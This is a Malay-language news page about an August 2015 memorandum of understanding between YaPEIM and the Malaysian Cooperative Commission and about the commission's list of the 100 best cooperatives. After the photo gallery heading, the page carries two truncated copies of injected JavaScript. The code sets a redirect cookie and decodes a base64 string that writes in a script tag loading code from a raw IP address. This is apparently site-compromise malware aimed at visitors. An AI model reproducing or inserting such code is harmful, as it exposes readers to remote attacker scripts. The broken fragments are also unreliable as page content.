YaPEIM » YaPEIM Perkasakan Rantaian Nilai Perniagaan Gerakan Koperasi

Terkini

YaPEIM Perkasakan Rantaian Nilai Perniagaan Gerakan Koperasi

Majlis menandatangani memorandum persefahaman (MoU) di antara YaPEIM dan Suruhanjaya Koperasi Malaysia (SKM)

KUCHING: Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) diberi tanggungjawab membantu memperkasakan penglibatan dan rantaian nilai di dalam pelbagai sektor perniagaan melalui gerakan koperasi seperti pemantapan pengurusan pusat pengedaran koperasi, pengukuhan modal insan melalui kerjasama latihan dan perkongsian kepakaran.

Ini dilaksanakan selaras dengan penandatanganan memorandum persefahaman (MoU) di antara YaPEIM dan Suruhanjaya Koperasi Malaysia (SKM) di sini, 16 Ogos 2015.

Timbalan Menteri Perdagangan Dalam Negeri, Koperasi dan Kepenggunaan, Datuk Seri Ahmad Bashah Md. Hanipah berkata, kerjasama SKM dan YaPEIM dapat membuka sejarah baru kepada kemajuan gerakan koperasi dalam negara.

“Sebagai sebuah badan berfungsi meningkatkan taraf sosioekonomi, mengukuhkan tradisi keilmuan, memantapkan kebajikan ummah dan membangunkan institusi Islam demi kepentingan pembangunan ummah, YaPEIM mampu melaksanakan usaha ini,” katanya ketika merasmikan Majlis Penghargaan 100 Koperasi Terbaik Malaysia 2015 di Tebingan Sungai Kuching, 16 Ogos 2015.

Pada majlis itu, Ahmad Bashah turut menyaksikan tiga perjanjian persefahaman (MoU) yang ditandatangani oleh SKM bersama Kementerian Belia dan Sukan, Teraju serta Bank Rakyat.

Hadir sama Ketua Pengarah YaPEIM, Datuk Abibullah Samsudin dan Pengarah Kanan Pembangunan Perniagaan dan Keusahawanan Unit Peneraju Agenda Bumiputera (Teraju), Megat Mohd. Yatim Megat Hamid.

Yang turut hadir Ketua Setiausaha Kementerian Belia dan Sukan, Datuk Jamil Salleh; Timbalan Ketua Setiausaha (Perdagangan Dalam Negeri), Datuk Azmi Lateh dan Pengarah Urusan Bank Kerjasama Rakyat Malaysia Berhad (Bank Rakyat), Datuk Mustafha Abd. Razak.

Sementara itu, Utusan Malaysia melaporkan Ahmad Bashah berkata, sebanyak 100 koperasi terbaik menyumbangkan RM25.8 bilion atau 74 peratus daripada jumlah perolehan gerakan koperasi yang berjumlah RM34.95 bilion tahun lalu.

Sejak 2012, penyenaraian 100 koperasi terbaik didominasi oleh koperasi kluster besar berbanding tahun sebelum itu.

“Koperasi fungsi perbankan dan kredit menguasai senarai 100 koperasi terbaik 2015 iaitu berjumlah 33 peratus diikuti pengangkutan (25 peratus), pengguna (15 peratus) dan bakinya adalah pertanian (12 peratus), perkhidmatan (11 peratus), perumahan (tiga peratus) dan pembinaan (satu peratus).

“Langkah Suruhanjaya Koperasi Malaysia (SKM) memperkenalkan piawaian Profil 100 Koperasi Terbaik Malaysia 2015 adalah tepat dan wajar yang menjadi kayu pengukur dalam usaha meningkatkan kecekapan dan keberkesanan amalan tadbir urus koperasi,” katanya.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top